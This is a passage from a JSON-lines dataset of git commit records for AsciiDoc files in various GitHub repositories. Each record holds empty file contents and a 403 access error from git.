403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9958513761da93dc4b95d9a24d166d927386e50","subject":"y2b create post Ultimate Gaming PC Giveaway (UGPC FINALE)","message":"y2b create post Ultimate Gaming PC Giveaway (UGPC FINALE)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-02-Ultimate-Gaming-PC-Giveaway-UGPC-FINALE.adoc","new_file":"_posts\/2013-02-02-Ultimate-Gaming-PC-Giveaway-UGPC-FINALE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17648e22f75aa9bc21faf9e07b36a32df3c51ff2","subject":"Update 2017-11-13-Mautic-Docker-Kohe.adoc","message":"Update 2017-11-13-Mautic-Docker-Kohe.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-13-Mautic-Docker-Kohe.adoc","new_file":"_posts\/2017-11-13-Mautic-Docker-Kohe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"754a704a84b9f33475478b218efadd05e0e6ff9a","subject":"Update 2016-01-07-browsers_spec.adoc","message":"Update 2016-01-07-browsers_spec.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2016-01-07-browsers_spec.adoc","new_file":"_posts\/2016-01-07-browsers_spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"820ca3c5cdc5c6c06535d52012caabde264b478e","subject":"Update 
2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"564014607946db0844a32de712b3212aa02bbc1b","subject":"Update 2015-02-24-Test.adoc","message":"Update 2015-02-24-Test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Test.adoc","new_file":"_posts\/2015-02-24-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"697c5df35d9fd36ca64d23d02a02bd098b8fb096","subject":"Update 2016-04-12-test.adoc","message":"Update 2016-04-12-test.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-12-test.adoc","new_file":"_posts\/2016-04-12-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d22e8018d8724652c709a9a6f7acdb818a398923","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4c4789f64ee77172dfc9957ee685cccc3db8e7f","subject":"Update 2018-02-23-measuring-performance-of-website.adoc","message":"Update 2018-02-23-measuring-performance-of-website.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-measuring-performance-of-website.adoc","new_file":"_posts\/2018-02-23-measuring-performance-of-website.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4767a4f48f738382eda3c2a5641e60c1d196ab5d","subject":"Update 2014-04-02-Episode-6-James-Bondage-or-Pinball-Fools.adoc","message":"Update 
2014-04-02-Episode-6-James-Bondage-or-Pinball-Fools.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-04-02-Episode-6-James-Bondage-or-Pinball-Fools.adoc","new_file":"_posts\/2014-04-02-Episode-6-James-Bondage-or-Pinball-Fools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46c3be4b3d707617024f7729b67ac5478b52750a","subject":"Update 2016-03-12-Simple-High-Availability.adoc","message":"Update 2016-03-12-Simple-High-Availability.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-03-12-Simple-High-Availability.adoc","new_file":"_posts\/2016-03-12-Simple-High-Availability.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06caf27fc074395ca96586ff402f338983c8109f","subject":"y2b create post LG G3 Mass Giveaway! [CLOSED]","message":"y2b create post LG G3 Mass Giveaway! [CLOSED]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-02-LG-G3-Mass-Giveaway-CLOSED.adoc","new_file":"_posts\/2014-07-02-LG-G3-Mass-Giveaway-CLOSED.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3e2744e24817a367670ca12e08acdc10dbd510a","subject":"Update 2017-03-14-iniciando-com-nativescript.adoc","message":"Update 2017-03-14-iniciando-com-nativescript.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-03-14-iniciando-com-nativescript.adoc","new_file":"_posts\/2017-03-14-iniciando-com-nativescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79a7bad78420e9237ec6cc2f702bffb6439f2702","subject":"Update 2015-09-01-Episode-21-Forum-Questions-Part-2.adoc","message":"Update 2015-09-01-Episode-21-Forum-Questions-Part-2.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-09-01-Episode-21-Forum-Questions-Part-2.adoc","new_file":"_posts\/2015-09-01-Episode-21-Forum-Questions-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7186a4c32a8d8a825d4bf33d5758973d123d045e","subject":"Update 
2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df0cc51672c072da9020c1d97abc41df82575ee5","subject":"Adds readme","message":"Adds readme\n","repos":"Alotor\/depository","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Alotor\/depository.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"1ccdc65b6f60662749e0c2953db5397803375a11","subject":"y2b create post The iPhone Enlarger - Does It Suck?","message":"y2b create post The iPhone Enlarger - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-10-The-iPhone-Enlarger--Does-It-Suck.adoc","new_file":"_posts\/2016-12-10-The-iPhone-Enlarger--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8969ff9b5e365fbbd3ed89dc87aada0fc6c7918","subject":"Release notes for 0.7.1","message":"Release notes for 0.7.1\n\nChange-Id: I75e32208754ce6e0d026d097871ccc05d2ca0cf7\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2446\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Jean-Daniel Cryans\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a4e61f17e0c1917b0efb1b91b5215f7f03c2704","subject":"Update 2015-04-15-Development-environment.adoc","message":"Update 2015-04-15-Development-environment.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-04-15-Development-environment.adoc","new_file":"_posts\/2015-04-15-Development-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b4673b8ded00760326fee0cd0f0cfe11c21320","subject":"fix(doc): title level start to 1","message":"fix(doc): title level start to 1\n","repos":"gravitee-io\/gravitee-policy-authentication","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-authentication.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0380c28066e0bd07c124bfcb86abb14b64e844c1","subject":"add adoc link to README","message":"add adoc link to README\n","repos":"nickalcock\/help2adoc,klali\/help2adoc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nickalcock\/help2adoc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c78b82af8c10ad4549162be079015a6678ed84fb","subject":"IF start","message":"IF start\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Divers\/IFc.adoc","new_file":"Divers\/IFc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57e1ef8e3250b9ac94bb61a4a8cdab156631ffc9","subject":"y2b create post SMS Audio - SYNC by 50 Headphones Unboxing","message":"y2b create post SMS Audio - SYNC by 50 Headphones Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-20-SMS-Audio--SYNC-by-50-Headphones-Unboxing.adoc","new_file":"_posts\/2012-01-20-SMS-Audio--SYNC-by-50-Headphones-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3140eaa6a3806f62c537925572db4992d09bd98c","subject":"y2b create post The Super Smartphone You've Never Heard Of...","message":"y2b create post The Super Smartphone You've Never Heard Of...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-22-The-Super-Smartphone-Youve-Never-Heard-Of.adoc","new_file":"_posts\/2017-11-22-The-Super-Smartphone-Youve-Never-Heard-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a8e62230fccdc2eb88a9880b6573b071eb7ac98","subject":"y2b create post What If You Could Get AirPods For Only $40?","message":"y2b create post What If You Could Get AirPods For Only $40?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-11-What-If-You-Could-Get-AirPods-For-Only-40.adoc","new_file":"_posts\/2018-02-11-What-If-You-Could-Get-AirPods-For-Only-40.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"592d80f3796d08f8a89f41c5089c03b9399302fe","subject":"Adds building-jdk8.adoc for backwards compatibility","message":"Adds building-jdk8.adoc for backwards compatibility\n","repos":"spring-cloud\/spring-cloud-build,spring-cloud\/spring-cloud-build","old_file":"docs\/src\/main\/asciidoc\/building-jdk8.adoc","new_file":"docs\/src\/main\/asciidoc\/building-jdk8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-build.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f655315a8d20be7654d3da0f0df75c4c191dd002","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"goern\/weather","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goern\/weather.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"004d5544ed89710fd7ecf34fcf44caa4c5e4b177","subject":"Updated README","message":"Updated README\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"025419fdd1df4880aa7da72c35a5265efb7e7f49","subject":"Test AsciiDoc","message":"Test AsciiDoc\n","repos":"juxt\/tick,juxt\/tick","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/tick.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"200d06af5b9ae2b3884a6c8ed94a113624e4c560","subject":"Update 2015-06-08-A-remplacer.adoc","message":"Update 2015-06-08-A-remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer.adoc","new_file":"_posts\/2015-06-08-A-remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1a7533d455c4d89c6b79b434c0b4b45faaf63c8","subject":"Update 2016-08-07-Hello-World.adoc","message":"Update 2016-08-07-Hello-World.adoc","repos":"loetjoe\/blog,loetjoe\/blog,loetjoe\/blog,loetjoe\/blog","old_file":"_posts\/2016-08-07-Hello-World.adoc","new_file":"_posts\/2016-08-07-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/loetjoe\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd0fc7e2e7737dace80c58b53901cc8cbbad4615","subject":"Update 2016-06-10-programming-study.adoc","message":"Update 
2016-06-10-programming-study.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-programming-study.adoc","new_file":"_posts\/2016-06-10-programming-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf591b08fa68484e0a00eff6884d3f27fa3845b0","subject":"Update 2019-02-27-Rancher-E-K-S-R-C.adoc","message":"Update 2019-02-27-Rancher-E-K-S-R-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77adb6ce61adf3ae53760db143df72bb1401d292","subject":"Grammatical fixes","message":"Grammatical fixes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"306651a308ecc355c1aa1728b3059d6fad84b624","subject":"remove extra \\","message":"remove extra \\\n","repos":"ato\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,ato\/yubico-piv-tool","old_file":"tool\/yubico-piv-tool.adoc","new_file":"tool\/yubico-piv-tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"32dbe462dbc7575c277d014befd49d4a42705f42","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3747055d207af55939e9c3a87f8630bbd6912b76","subject":"Update 2015-02-24-test.adoc","message":"Update 2015-02-24-test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-test.adoc","new_file":"_posts\/2015-02-24-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"350cb0aa484b4bea0c0e7476bbf266872cd8fcd6","subject":"Update 
2016-05-19-Gradle-and-Kotlin.adoc","message":"Update 2016-05-19-Gradle-and-Kotlin.adoc","repos":"benignbala\/benignbala.hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io","old_file":"_posts\/2016-05-19-Gradle-and-Kotlin.adoc","new_file":"_posts\/2016-05-19-Gradle-and-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benignbala\/benignbala.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dad28552f5eea7c1c45f1866f1417794dc49a65","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64f3405e5fe37956f721c3d8b548a8f86145bdeb","subject":"Installation doc in asciidoc format","message":"Installation doc in asciidoc format\n","repos":"imadLamari\/carto_teach_planning,imadLamari\/carto_teach_planning","old_file":"docs\/install.adoc","new_file":"docs\/install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/imadLamari\/carto_teach_planning.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1e6723c4bc307a84066c89c73e6595692b5a013","subject":"Update 2015-02-19-Manual-de-Git-En-Espanol.adoc","message":"Update 2015-02-19-Manual-de-Git-En-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-19-Manual-de-Git-En-Espanol.adoc","new_file":"_posts\/2015-02-19-Manual-de-Git-En-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93c64ca6fa85a54cf9e12cb0131608cfdcc6b571","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"daf198095d717a85235d7c8a4ed69d2cb5947b7d","subject":"Update 2017-05-26-Guards-guards-in-haskell.adoc","message":"Update 
2017-05-26-Guards-guards-in-haskell.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-26-Guards-guards-in-haskell.adoc","new_file":"_posts\/2017-05-26-Guards-guards-in-haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8165dd9cfba1ec369a081e85803831b42a28abfb","subject":"Update 2017-10-15-First-tip-find-your-HOME.adoc","message":"Update 2017-10-15-First-tip-find-your-HOME.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-15-First-tip-find-your-HOME.adoc","new_file":"_posts\/2017-10-15-First-tip-find-your-HOME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a8979bd542706094c25881fe7602c4c90f8d49d","subject":"Update 2017-03-17-Dogmatisch-Scholastisch-Spekulativ.adoc","message":"Update 2017-03-17-Dogmatisch-Scholastisch-Spekulativ.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-03-17-Dogmatisch-Scholastisch-Spekulativ.adoc","new_file":"_posts\/2017-03-17-Dogmatisch-Scholastisch-Spekulativ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f733bd42283cf3547eec79e53611a2995713bd8","subject":"Update 2017-04-06-Arrivo-al-Castello-Alcuni-incontri.adoc","message":"Update 2017-04-06-Arrivo-al-Castello-Alcuni-incontri.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-06-Arrivo-al-Castello-Alcuni-incontri.adoc","new_file":"_posts\/2017-04-06-Arrivo-al-Castello-Alcuni-incontri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0828ebb2e73ce5a7900fbb031e163752c0bf6514","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"699050d0551950e29bb2ed99395373ac0ef64550","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 
